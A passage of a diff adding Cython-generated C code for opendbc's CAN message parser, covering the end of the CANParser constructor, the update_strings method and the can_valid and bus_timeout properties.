(unlikely(__pyx_t_22 == 0)) break; + if (unlikely(__pyx_t_22 == -1)) __PYX_ERR(0, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GOTREF(__pyx_t_10); + __Pyx_XDECREF_SET(__pyx_v_msg_address, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_XDECREF_SET(__pyx_v_freq, __pyx_t_10); + __pyx_t_10 = 0; + + /* "opendbc/can/parser_pyx.pyx":104 + * cdef MessageParseOptions mpo + * for msg_address, freq in message_options.items(): + * mpo.address = msg_address # <<<<<<<<<<<<<< + * mpo.check_frequency = freq + * message_options_v.push_back(mpo) + */ + __pyx_t_21 = __Pyx_PyInt_As_uint32_t(__pyx_v_msg_address); if (unlikely((__pyx_t_21 == ((uint32_t)-1)) && PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L1_error) + __pyx_v_mpo.address = __pyx_t_21; + + /* "opendbc/can/parser_pyx.pyx":105 + * for msg_address, freq in message_options.items(): + * mpo.address = msg_address + * mpo.check_frequency = freq # <<<<<<<<<<<<<< + * message_options_v.push_back(mpo) + * + */ + __pyx_t_22 = __Pyx_PyInt_As_int(__pyx_v_freq); if (unlikely((__pyx_t_22 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 105, __pyx_L1_error) + __pyx_v_mpo.check_frequency = __pyx_t_22; + + /* "opendbc/can/parser_pyx.pyx":106 + * mpo.address = msg_address + * mpo.check_frequency = freq + * message_options_v.push_back(mpo) # <<<<<<<<<<<<<< + * + * self.can = new cpp_CANParser(bus, dbc_name, message_options_v, signal_options_v) + */ + try { + __pyx_v_message_options_v.push_back(__pyx_v_mpo); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 106, __pyx_L1_error) + } + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":108 + * message_options_v.push_back(mpo) + * + * self.can = new cpp_CANParser(bus, dbc_name, message_options_v, signal_options_v) # <<<<<<<<<<<<<< + * self.update_strings([]) + * + */ + __pyx_t_12 = __Pyx_PyInt_As_int(__pyx_v_bus); if (unlikely((__pyx_t_12 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 108, __pyx_L1_error) + __pyx_t_3 = __pyx_convert_string_from_py_std__in_string(__pyx_v_dbc_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 108, __pyx_L1_error) + __pyx_cur_scope->__pyx_v_self->can = new CANParser(__pyx_t_12, __pyx_t_3, __pyx_v_message_options_v, __pyx_v_signal_options_v); + + /* "opendbc/can/parser_pyx.pyx":109 + * + * self.can = new cpp_CANParser(bus, dbc_name, message_options_v, signal_options_v) + * self.update_strings([]) # <<<<<<<<<<<<<< + * + * def update_strings(self, strings, sendcan=False): + */ + __pyx_t_10 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_cur_scope->__pyx_v_self), __pyx_n_s_update_strings); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_4 = PyList_New(0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_11 = NULL; + __pyx_t_12 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_10))) { + __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_10); + if (likely(__pyx_t_11)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_10); + __Pyx_INCREF(__pyx_t_11); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_10, function); + __pyx_t_12 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_11, __pyx_t_4}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_10, __pyx_callargs+1-__pyx_t_12, 1+__pyx_t_12); + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":31 + * string dbc_name + * + * def __init__(self, dbc_name, signals, checks=None, bus=0, enforce_checks=True): # <<<<<<<<<<<<<< + * if checks is None: + * checks = [] + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_10); + __Pyx_XDECREF(__pyx_t_11); + __Pyx_XDECREF(__pyx_t_19); + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_msg_name_to_address); + __Pyx_XDECREF(__pyx_v_msg_address_to_signals); + __Pyx_XDECREF(__pyx_v_name); + __Pyx_XDECREF(__pyx_v_s); + __Pyx_XDECREF(__pyx_v_address); + __Pyx_XDECREF(__pyx_v_c); + __Pyx_XDECREF(__pyx_v_checked_addrs); + __Pyx_XDECREF(__pyx_v_signal_addrs); + __Pyx_XDECREF(__pyx_v_unchecked); + __Pyx_XDECREF(__pyx_v_err_msg); + __Pyx_XDECREF(__pyx_v_sig_name); + __Pyx_XDECREF(__pyx_v_sig_address); + __Pyx_XDECREF(__pyx_v_message_options); + __Pyx_XDECREF(__pyx_v_msg_address); + __Pyx_XDECREF(__pyx_v_freq); + __Pyx_XDECREF(__pyx_7genexpr__pyx_v_c); + __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_s); + __Pyx_XDECREF(__pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___2generator); + __Pyx_XDECREF(__pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___5generator1); + __Pyx_XDECREF(__pyx_v_checks); + __Pyx_DECREF((PyObject *)__pyx_cur_scope); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":111 + * self.update_strings([]) + * + * def update_strings(self, strings, sendcan=False): # <<<<<<<<<<<<<< + * for v in self.vl_all.values(): + * for l in v.values(): # no-cython-lint + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_3update_strings(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7opendbc_3can_10parser_pyx_9CANParser_3update_strings = {"update_strings", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_3update_strings, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_3update_strings(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_strings = 0; + PyObject *__pyx_v_sendcan = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("update_strings (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_strings,&__pyx_n_s_sendcan,0}; + PyObject* values[2] = {0,0}; + values[1] = ((PyObject *)Py_False); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_strings)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 111, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_sendcan); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 111, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "update_strings") < 0)) __PYX_ERR(0, 111, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_strings = values[0]; + __pyx_v_sendcan = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("update_strings", 0, 1, 2, __pyx_nargs); __PYX_ERR(0, 111, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.update_strings", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_2update_strings(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self), __pyx_v_strings, __pyx_v_sendcan); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_2update_strings(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self, PyObject *__pyx_v_strings, PyObject *__pyx_v_sendcan) { + PyObject *__pyx_v_v = NULL; + PyObject *__pyx_v_l = NULL; + std::vector __pyx_v_new_vals; + std::unordered_set __pyx_v_updated_addrs; + std::vector ::iterator __pyx_v_it; + struct SignalValue *__pyx_v_cv; + PyObject *__pyx_v_cv_name = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + Py_ssize_t __pyx_t_8; + PyObject *__pyx_t_9 = NULL; + int __pyx_t_10; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + std::vector __pyx_t_13; + bool __pyx_t_14; + int __pyx_t_15; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("update_strings", 0); + + /* "opendbc/can/parser_pyx.pyx":112 + * + * def update_strings(self, strings, sendcan=False): + * for v in self.vl_all.values(): # <<<<<<<<<<<<<< + * for l in v.values(): # no-cython-lint + * l.clear() + */ + __pyx_t_2 = 0; + if (unlikely(__pyx_v_self->vl_all == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "values"); + __PYX_ERR(0, 112, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_dict_iterator(__pyx_v_self->vl_all, 1, __pyx_n_s_values, (&__pyx_t_3), (&__pyx_t_4)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_1); + __pyx_t_1 = __pyx_t_5; + __pyx_t_5 = 0; + while (1) { + __pyx_t_6 = __Pyx_dict_iter_next(__pyx_t_1, __pyx_t_3, &__pyx_t_2, NULL, &__pyx_t_5, NULL, __pyx_t_4); + if (unlikely(__pyx_t_6 == 0)) break; + if (unlikely(__pyx_t_6 == -1)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XDECREF_SET(__pyx_v_v, __pyx_t_5); + __pyx_t_5 = 0; + + /* "opendbc/can/parser_pyx.pyx":113 + * def update_strings(self, strings, sendcan=False): + * for v in self.vl_all.values(): + * for l in v.values(): # no-cython-lint # <<<<<<<<<<<<<< + * l.clear() + * + */ + __pyx_t_7 = 0; + if (unlikely(__pyx_v_v == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "values"); + __PYX_ERR(0, 113, __pyx_L1_error) + } + __pyx_t_9 = __Pyx_dict_iterator(__pyx_v_v, 0, __pyx_n_s_values, (&__pyx_t_8), (&__pyx_t_6)); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 113, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __Pyx_XDECREF(__pyx_t_5); + __pyx_t_5 = __pyx_t_9; + __pyx_t_9 = 0; + while (1) { + __pyx_t_10 = __Pyx_dict_iter_next(__pyx_t_5, __pyx_t_8, &__pyx_t_7, NULL, &__pyx_t_9, NULL, __pyx_t_6); + if (unlikely(__pyx_t_10 == 0)) break; + if (unlikely(__pyx_t_10 == -1)) __PYX_ERR(0, 113, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __Pyx_XDECREF_SET(__pyx_v_l, __pyx_t_9); + __pyx_t_9 = 0; + + /* "opendbc/can/parser_pyx.pyx":114 + * for v in self.vl_all.values(): + * for l in v.values(): # no-cython-lint + * l.clear() # <<<<<<<<<<<<<< + * + * cdef vector[SignalValue] new_vals + */ + __pyx_t_11 = __Pyx_PyObject_GetAttrStr(__pyx_v_l, __pyx_n_s_clear); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 114, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_12 = NULL; + __pyx_t_10 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_11))) { + __pyx_t_12 = PyMethod_GET_SELF(__pyx_t_11); + if (likely(__pyx_t_12)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_11); + __Pyx_INCREF(__pyx_t_12); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_11, function); + __pyx_t_10 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_12, }; + __pyx_t_9 = __Pyx_PyObject_FastCall(__pyx_t_11, __pyx_callargs+1-__pyx_t_10, 0+__pyx_t_10); + __Pyx_XDECREF(__pyx_t_12); __pyx_t_12 = 0; + if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 114, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + } + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + } + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "opendbc/can/parser_pyx.pyx":119 + * cdef unordered_set[uint32_t] updated_addrs + * + * self.can.update_strings(strings, new_vals, sendcan) # <<<<<<<<<<<<<< + * cdef vector[SignalValue].iterator it = new_vals.begin() + * cdef SignalValue* cv + */ + __pyx_t_13 = __pyx_convert_vector_from_py_std_3a__3a_string(__pyx_v_strings); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 119, __pyx_L1_error) + __pyx_t_14 = __Pyx_PyObject_IsTrue(__pyx_v_sendcan); if (unlikely((__pyx_t_14 == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 119, __pyx_L1_error) + __pyx_v_self->can->update_strings(__pyx_t_13, __pyx_v_new_vals, __pyx_t_14); + + /* "opendbc/can/parser_pyx.pyx":120 + * + * self.can.update_strings(strings, new_vals, sendcan) + * cdef vector[SignalValue].iterator it = new_vals.begin() # <<<<<<<<<<<<<< + * cdef SignalValue* cv + * while it != new_vals.end(): + */ + __pyx_v_it = __pyx_v_new_vals.begin(); + + /* "opendbc/can/parser_pyx.pyx":122 + * cdef vector[SignalValue].iterator it = new_vals.begin() + * cdef SignalValue* cv + * while it != new_vals.end(): # <<<<<<<<<<<<<< + * cv = &deref(it) + * # Cast char * directly to unicode + */ + while (1) { + __pyx_t_15 = (__pyx_v_it != __pyx_v_new_vals.end()); + if (!__pyx_t_15) break; + + /* "opendbc/can/parser_pyx.pyx":123 + * cdef SignalValue* cv + * while it != new_vals.end(): + * cv = &deref(it) # <<<<<<<<<<<<<< + * # Cast char * directly to unicode + * cv_name = cv.name + */ + __pyx_v_cv = (&(*__pyx_v_it)); + + /* "opendbc/can/parser_pyx.pyx":125 + * cv = &deref(it) + * # Cast char * directly to unicode + * cv_name = cv.name # <<<<<<<<<<<<<< + * self.vl[cv.address][cv_name] = cv.value + * self.vl_all[cv.address][cv_name] = cv.all_values + */ + __pyx_t_1 = __pyx_convert_PyUnicode_string_to_py_std__in_string(__pyx_v_cv->name); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 125, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = __pyx_t_1; + __Pyx_INCREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF_SET(__pyx_v_cv_name, ((PyObject*)__pyx_t_5)); + __pyx_t_5 = 0; + + /* "opendbc/can/parser_pyx.pyx":126 + * # Cast char * directly to unicode + * cv_name = cv.name + * self.vl[cv.address][cv_name] = cv.value # <<<<<<<<<<<<<< + * self.vl_all[cv.address][cv_name] = cv.all_values + * self.ts_nanos[cv.address][cv_name] = cv.ts_nanos + */ + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_cv->value); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 126, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (unlikely(__pyx_v_self->vl == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 126, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_PyInt_From_uint32_t(__pyx_v_cv->address); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 126, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_9 = __Pyx_PyDict_GetItem(__pyx_v_self->vl, __pyx_t_1); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 126, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyObject_SetItem(__pyx_t_9, __pyx_v_cv_name, __pyx_t_5) < 0))) __PYX_ERR(0, 126, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "opendbc/can/parser_pyx.pyx":127 + * cv_name = cv.name + * self.vl[cv.address][cv_name] = cv.value + * self.vl_all[cv.address][cv_name] = cv.all_values # <<<<<<<<<<<<<< + * self.ts_nanos[cv.address][cv_name] = cv.ts_nanos + * updated_addrs.insert(cv.address) + */ + __pyx_t_5 = __pyx_convert_vector_to_py_double(__pyx_v_cv->all_values); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 127, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (unlikely(__pyx_v_self->vl_all == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 127, __pyx_L1_error) + } + __pyx_t_9 = __Pyx_PyInt_From_uint32_t(__pyx_v_cv->address); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 127, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __pyx_t_1 = __Pyx_PyDict_GetItem(__pyx_v_self->vl_all, __pyx_t_9); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 127, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + if (unlikely((PyObject_SetItem(__pyx_t_1, __pyx_v_cv_name, __pyx_t_5) < 0))) __PYX_ERR(0, 127, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "opendbc/can/parser_pyx.pyx":128 + * self.vl[cv.address][cv_name] = cv.value + * self.vl_all[cv.address][cv_name] = cv.all_values + * self.ts_nanos[cv.address][cv_name] = cv.ts_nanos # <<<<<<<<<<<<<< + * updated_addrs.insert(cv.address) + * preinc(it) + */ + __pyx_t_5 = __Pyx_PyInt_From_uint64_t(__pyx_v_cv->ts_nanos); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 128, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (unlikely(__pyx_v_self->ts_nanos == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 128, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_PyInt_From_uint32_t(__pyx_v_cv->address); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 128, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_9 = __Pyx_PyDict_GetItem(__pyx_v_self->ts_nanos, __pyx_t_1); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 128, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyObject_SetItem(__pyx_t_9, __pyx_v_cv_name, __pyx_t_5) < 0))) __PYX_ERR(0, 128, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "opendbc/can/parser_pyx.pyx":129 + * self.vl_all[cv.address][cv_name] = cv.all_values + * self.ts_nanos[cv.address][cv_name] = cv.ts_nanos + * updated_addrs.insert(cv.address) # <<<<<<<<<<<<<< + * preinc(it) + * + */ + try { + __pyx_v_updated_addrs.insert(__pyx_v_cv->address); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 129, __pyx_L1_error) + } + + /* "opendbc/can/parser_pyx.pyx":130 + * self.ts_nanos[cv.address][cv_name] = cv.ts_nanos + * updated_addrs.insert(cv.address) + * preinc(it) # <<<<<<<<<<<<<< + * + * return updated_addrs + */ + (void)((++__pyx_v_it)); + } + + /* "opendbc/can/parser_pyx.pyx":132 + * preinc(it) + * + * return updated_addrs # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_5 = __pyx_convert_unordered_set_to_py_uint32_t(__pyx_v_updated_addrs); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 132, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_r = __pyx_t_5; + __pyx_t_5 = 0; + goto __pyx_L0; + + /* "opendbc/can/parser_pyx.pyx":111 + * self.update_strings([]) + * + * def update_strings(self, strings, sendcan=False): # <<<<<<<<<<<<<< + * for v in self.vl_all.values(): + * for l in v.values(): # no-cython-lint + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_9); + __Pyx_XDECREF(__pyx_t_11); + __Pyx_XDECREF(__pyx_t_12); + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.update_strings", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_v); + __Pyx_XDECREF(__pyx_v_l); + __Pyx_XDECREF(__pyx_v_cv_name); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":134 + * return updated_addrs + * + * @property # <<<<<<<<<<<<<< + * def can_valid(self): + * return self.can.can_valid + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_9can_valid_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_9can_valid_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_9can_valid___get__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_9can_valid___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "opendbc/can/parser_pyx.pyx":136 + * @property + * def can_valid(self): + * return self.can.can_valid # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->can->can_valid); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 136, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "opendbc/can/parser_pyx.pyx":134 + * return updated_addrs + * + * @property # <<<<<<<<<<<<<< + * def can_valid(self): + * return self.can.can_valid + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.can_valid.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":138 + * return self.can.can_valid + * + * @property # <<<<<<<<<<<<<< + * def bus_timeout(self): + * return self.can.bus_timeout + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_11bus_timeout_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_11bus_timeout_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_11bus_timeout___get__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_11bus_timeout___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "opendbc/can/parser_pyx.pyx":140 + * @property + * def bus_timeout(self): + * return self.can.bus_timeout # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->can->bus_timeout); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 140, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "opendbc/can/parser_pyx.pyx":138 + * return self.can.can_valid + * + * @property # <<<<<<<<<<<<<< + * def bus_timeout(self): + * return self.can.bus_timeout + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.bus_timeout.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":26 + * + * cdef readonly: + * dict vl # <<<<<<<<<<<<<< + * dict vl_all + * 